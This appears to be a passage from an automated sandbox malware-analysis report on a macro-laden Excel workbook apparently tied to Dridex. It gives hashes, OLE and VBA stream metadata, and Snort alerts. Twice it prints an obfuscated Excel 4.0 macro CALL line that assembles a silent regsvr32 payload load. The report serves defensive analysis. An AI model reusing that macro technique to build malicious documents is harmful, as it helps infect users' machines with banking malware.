                Preview: __cfduid.d24425c38282fae9d3f801a2e53842d3c1610552347.invoteqleads.com/.9728.855433088.30867797.2738363972.30861837.*.
                C:\Users\user\Desktop\EF0F0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):61904
                Entropy (8bit):7.860717323686253
                Encrypted:false
                SSDEEP:1536:hOde+x8IYjqmC7n05w2IdtwlvRwRwUxiFJXAGFqXYE:h0f8DjlDyJTwgRSSR5
                MD5:BEE18E0E9DCAFB36583D4FEE74EBF52A
                SHA1:41D4B669E6B0F091230914EBFC4A08921E3868F9
                SHA-256:BF825432224A2A46D0D9F3AF3CCF72A3BB2824BB7BB8105F051F0218DF11F861
                SHA-512:3978F620C2134321EBBFE8C5DAD57765E1C9325EEC416F28B5D27705BCB30EA499FF411AF76E959D58A66336CE30EB779069FBE8C5C2E683FD4FEAB4080E593A
                Malicious:false
                Preview: ...n.0.E.......H...(,g..6@S.[......(..w(9...a....u..q...........+R..N*....o.gR....Y..."....~<z...m..>%...(.`x..........\..........&..L.l.wP.'.......l.%........^+.....+/ ..k%@:.d.F....HFS....OH.....2..]0..1....0...-..&......|_;.....W>~......x..u.n.....+.....*(.....;7..Y.....s.:.e..XB+@..3R.Ep..o5..W...#...N.Yw.Y.|U.`rBK)o.dz..g.H.{...k........t.....4.m...3d...N..?.........N.k.....DO....A..b...-.....D.....q..8..,../#..K.F.......3...r..q... ..;.6........PK..........!.........*.......[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\Desktop\~$sample20210113-01.xlsm
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):330
                Entropy (8bit):1.4377382811115937
                Encrypted:false
                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                MD5:96114D75E30EBD26B572C1FC83D1D02E
                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                Malicious:true
                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                Static File Info

                General

                File type:Microsoft Excel 2007+
                Entropy (8bit):7.781495931219212
                TrID:
                • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                • ZIP compressed archive (8000/1) 7.58%
                File name:sample20210113-01.xlsm
                File size:45428
                MD5:b777540ad31de24618cb9818debb2fd4
                SHA1:6e18fab506aefe0e1d1bdbb7bf61963075a4db61
                SHA256:39c47b42df4d66fe9b9e4cb03f486a6a8a11770010dd6537c55d2899b2e2021a
                SHA512:907ca45f11527b8446f00e79268e1f03817c0fb7097965cb69267ec82f25eeddec64651e4c2079f8a7661404549e26230ee4cd35633fda96af8f664ea0f05a68
                SSDEEP:768:fwmj1m7XneIlWuYLyhtXgfqxUb7+7SAh0lTPdVGki+FVqiZ8z:fjurlWoAqxWASyijGOqiZ8z
                File Content Preview:PK..........!.o.m.....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                File Icon

                Icon Hash:e4e2aa8aa4bcbcac

                Static OLE Info

                General

                Document Type:OpenXML
                Number of OLE Files:2

                OLE File "/opt/package/joesandbox/database/analysis/339173/sample/sample20210113-01.xlsm"

                Indicators

                Has Summary Info:False
                Application Name:unknown
                Encrypted Document:False
                Contains Word Document Stream:
                Contains Workbook/Book Stream:
                Contains PowerPoint Document Stream:
                Contains Visio Document Stream:
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:True

                Summary

                Author:
                Last Saved By:
                Create Time:2020-12-07T14:38:21Z
                Last Saved Time:2021-01-13T12:13:43Z
                Creating Application:Microsoft Excel
                Security:0

                Document Summary

                Thumbnail Scaling Desired:false
                Company:
                Contains Dirty Links:false
                Shared Document:false
                Changed Hyperlinks:false
                Application Version:16.0300

                Streams with VBA

                VBA File Name: Module1.bas, Stream Size: 3211
                General
                Stream Path:VBA/Module1
                VBA File Name:Module1.bas
                Stream Size:3211
                Data ASCII:. . . . . . . . . * . . . . . . . . . . . . . . . X . . . . . . . . . . . . . . . . x . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 03 00 03 f0 00 00 00 2a 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 58 05 00 00 00 0a 00 00 00 00 00 00 01 00 00 00 ba 78 ca 26 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                VBA Code Keywords

                Keyword
                redline(Oa))))
                ellysio
                Sheets(ol).Cells(ellysio,
                Integer:
                "listP_"
                VB_Name
                String
                homedep
                Error
                redline(yel
                Integer)
                "ab")
                Function
                ellysio()
                "!"):
                "ab":
                Split(govs,
                Randomize:
                Integer
                ol).UsedRange.SpecialCells(xlCellTypeConstants)
                ol).value
                homedep(nimo
                Wscript.echo
                nimo(Int((UBound(nimo)
                Replace(Vo,
                ViiM(sem.value)
                Chr(sem.Row)
                ol).Name
                redline(ellysio))
                Split(kij(ol),
                Next:
                Variant)
                Rnd))
                Attribute
                Resume
                redline
                Sheets(ol
                Run(""
                VBA Code
                VBA File Name: Sheet1.cls, Stream Size: 1623
                General
                Stream Path:VBA/Sheet1
                VBA File Name:Sheet1.cls
                Stream Size:1623
                Data ASCII:. . . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . . . . . . . . x . k . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . " . v i e w _ 1 _ a , 1 , 0 , M S F o r m s , M u l t i P a g e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . .
                Data Raw:01 16 03 00 00 16 01 00 00 c8 03 00 00 fa 00 00 00 26 02 00 00 ff ff ff ff cf 03 00 00 f3 04 00 00 00 00 00 00 01 00 00 00 ba 78 c2 6b 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                VBA Code Keywords

                Keyword
                Index
                VB_Name
                VB_Creatable
                Application.OnTime
                VB_Exposed
                Long)
                "mi_"
                VB_Customizable
                VB_Control
                MultiPage"
                VB_TemplateDerived
                MSForms,
                False
                Attribute
                Private
                VB_PredeclaredId
                VB_GlobalNameSpace
                VB_Base
                VBA Code
                VBA File Name: ThisWorkbook.cls, Stream Size: 999
                General
                Stream Path:VBA/ThisWorkbook
                VBA File Name:ThisWorkbook.cls
                Stream Size:999
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . x . d . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 ba 78 1c 64 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                VBA Code Keywords

                Keyword
                False
                VB_Exposed
                Attribute
                VB_Name
                VB_Creatable
                "ThisWorkbook"
                VB_PredeclaredId
                VB_GlobalNameSpace
                VB_Base
                VB_Customizable
                VB_TemplateDerived
                VBA Code

                Streams

                Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 542
                General
                Stream Path:PROJECT
                File Type:ASCII text, with CRLF line terminators
                Stream Size:542
                Entropy:5.22322002043
                Base64 Encoded:True
                Data ASCII:I D = " { 4 9 3 4 E D C 8 - 1 B 9 3 - 4 5 B C - B 6 9 3 - D B B 2 9 D 5 C 1 4 7 1 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4 1 4 3 B 2 3 2 B 6 3 2 B 6 3 2 B 6 3 2 B 6 " . . D P B = " 8 2 8 0 7 1 3 2 B 3 3 3 B 3 3 3 B 3 " . . G C = " C 3
                Data Raw:49 44 3d 22 7b 34 39 33 34 45 44 43 38 2d 31 42 39 33 2d 34 35 42 43 2d 42 36 39 33 2d 44 42 42 32 39 44 35 43 31 34 37 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d
                Stream Path: PROJECTwm, File Type: data, Stream Size: 86
                General
                Stream Path:PROJECTwm
                File Type:data
                Stream Size:86
                Entropy:3.24455457963
                Base64 Encoded:False
                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00
                Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3558
                General
                Stream Path:VBA/_VBA_PROJECT
                File Type:data
                Stream Size:3558
                Entropy:4.423627705
                Base64 Encoded:False
                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2042
                General
                Stream Path:VBA/__SRP_0
                File Type:data
                Stream Size:2042
                Entropy:3.40353512267
                Base64 Encoded:False
                Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . ( l ~ j 0 . > N . . . . . . . . . . . . . . . .
                Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
                Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 187
                General
                Stream Path:VBA/__SRP_1
                File Type:data
                Stream Size:187
                Entropy:1.91493173134
                Base64 Encoded:False
                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y e l . . . . . . . . . . . . . . . . w q . . . . . . . . . . . . . . . . n i m o ^ . . . . . . . . . . . . . . .
                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 02 00 00 00 00 00 00 08 03 00 00 00 00 00
                Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 355
                General
                Stream Path:VBA/__SRP_2
                File Type:data
                Stream Size:355
                Entropy:2.22761106048
                Base64 Encoded:False
                Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z
                Data Raw:72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 398
                General
                Stream Path:VBA/__SRP_3
                File Type:data
                Stream Size:398
                Entropy:2.07709195049
                Base64 Encoded:False
                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                Stream Path: VBA/dir, File Type: data, Stream Size: 819
                General
                Stream Path:VBA/dir
                File Type:data
                Stream Size:819
                Entropy:6.51488453488
                Base64 Encoded:True
                Data ASCII:. / . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                Data Raw:01 2f b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 d8 f8 ed 61 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                Macro 4.0 Code

                CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)

                "=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

                OLE File "/opt/package/joesandbox/database/analysis/339173/sample/sample20210113-01.xlsm"

                Indicators

                Has Summary Info:False
                Application Name:unknown
                Encrypted Document:False
                Contains Word Document Stream:
                Contains Workbook/Book Stream:
                Contains PowerPoint Document Stream:
                Contains Visio Document Stream:
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:False

                Summary

                Author:
                Last Saved By:
                Create Time:2020-12-07T14:38:21Z
                Last Saved Time:2021-01-13T12:13:43Z
                Creating Application:Microsoft Excel
                Security:0

                Document Summary

                Thumbnail Scaling Desired:false
                Company:
                Contains Dirty Links:false
                Shared Document:false
                Changed Hyperlinks:false
                Application Version:16.0300

                Streams

                Stream Path: \x1CompObj, File Type: data, Stream Size: 115
                General
                Stream Path:\x1CompObj
                File Type:data
                Stream Size:115
                Entropy:4.80096587863
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . p . . F z ? . . . . . . . a . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . M u l t i P a g e . 1 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 70 13 e3 46 7a 3f ce 11 be d6 00 aa 00 61 10 80 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 12 00 00 00 46 6f 72 6d 73 2e 4d 75 6c 74 69 50 61 67 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: f, File Type: data, Stream Size: 178
                General
                Stream Path:f
                File Type:data
                Stream Size:178
                Entropy:2.68174465556
                Base64 Encoded:False
                Data ASCII:. . $ . H . . . . . . . . @ . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . . . . . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . # . . . . . . . P a g e 1 r i . . . . . . . . . . . $ . . . . . . . . . . . . . ! . . . . . . . P a g e 2 . . . 5 . . . . . . . . . . . . . . . T . . .
                Data Raw:00 04 24 00 48 0c 00 0c 03 00 00 00 04 40 00 00 04 00 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 74 00 00 00 00 83 01 00 00 00 1c 00 f4 01 00 00 01 00 00 00 32 00 00 00 98 00 00 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 24 00 d5 01 00 00 05 00 00 80 02 00 00 00 23 00 04 00 01 00 07 00 50 61 67 65 31 72 69 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: i02/\x1CompObj, File Type: data, Stream Size: 110
                General
                Stream Path:i02/\x1CompObj
                File Type:data
                Stream Size:110
                Entropy:4.63372611993
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: i02/f, File Type: data, Stream Size: 40
                General
                Stream Path:i02/f
                File Type:data
                Stream Size:40
                Entropy:1.54176014818
                Base64 Encoded:False
                Data ASCII:. . . . @ . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: i02/o, File Type: empty, Stream Size: 0
                General
                Stream Path:i02/o
                File Type:empty
                Stream Size:0
                Entropy:0.0
                Base64 Encoded:False
                Data ASCII:
                Data Raw:
                Stream Path: i03/\x1CompObj, File Type: data, Stream Size: 110
                General
                Stream Path:i03/\x1CompObj
                File Type:data
                Stream Size:110
                Entropy:4.63372611993
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: i03/f, File Type: data, Stream Size: 40
                General
                Stream Path:i03/f
                File Type:data
                Stream Size:40
                Entropy:1.90677964945
                Base64 Encoded:False
                Data ASCII:. . . . @ . . . . . . . . } . . n . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 6e 13 00 00 fd 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: i03/o, File Type: empty, Stream Size: 0
                General
                Stream Path:i03/o
                File Type:empty
                Stream Size:0
                Entropy:0.0
                Base64 Encoded:False
                Data ASCII:
                Data Raw:
                Stream Path: o, File Type: data, Stream Size: 152
                General
                Stream Path:o
                File Type:data
                Stream Size:152
                Entropy:2.94405417931
                Base64 Encoded:False
                Data ASCII:. . p . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P a g e 1 . . ? . . . . P a g e 2 . . ? . . . . . . . . . . . . T a b 3 . . . . T a b 4 . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i . . . . . . . . .
                Data Raw:00 02 70 00 31 82 fa 00 00 00 00 00 18 00 00 00 02 00 00 00 08 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 02 00 00 00 08 00 00 00 84 00 00 00 84 00 00 00 05 00 00 80 50 61 67 65 31 f5 fa 3f 05 00 00 80 50 61 67 65 32 f5 fa 3f 00 00 00 00 00 00 00 00 04 00 00 80 54 61 62 33 04 00 00 80 54 61 62 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80
                Stream Path: x, File Type: data, Stream Size: 48
                General
                Stream Path:x
                File Type:data
                Stream Size:48
                Entropy:1.42267983198
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 0c 00 06 00 00 00 02 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00

                Macro 4.0 Code

                CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)

                "=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                01/13/21-16:39:05.193563TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349167221.126.244.72192.168.2.22
                01/13/21-16:39:09.162191TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349170221.126.244.72192.168.2.22
                01/13/21-16:39:09.822187TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949171195.231.69.151192.168.2.22
                01/13/21-16:39:11.438888TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949173195.231.69.151192.168.2.22
                01/13/21-16:39:13.268612TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349175221.126.244.72192.168.2.22
                01/13/21-16:39:14.864235TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949177195.231.69.151192.168.2.22
                01/13/21-16:39:14.891390TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349176221.126.244.72192.168.2.22
                01/13/21-16:39:16.500830TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949179195.231.69.151192.168.2.22
                01/13/21-16:39:18.261352TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349181221.126.244.72192.168.2.22
                01/13/21-16:39:19.851961TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949183195.231.69.151192.168.2.22
                01/13/21-16:39:19.909943TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349182221.126.244.72192.168.2.22
                01/13/21-16:39:21.495031TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)388949185195.231.69.151192.168.2.22
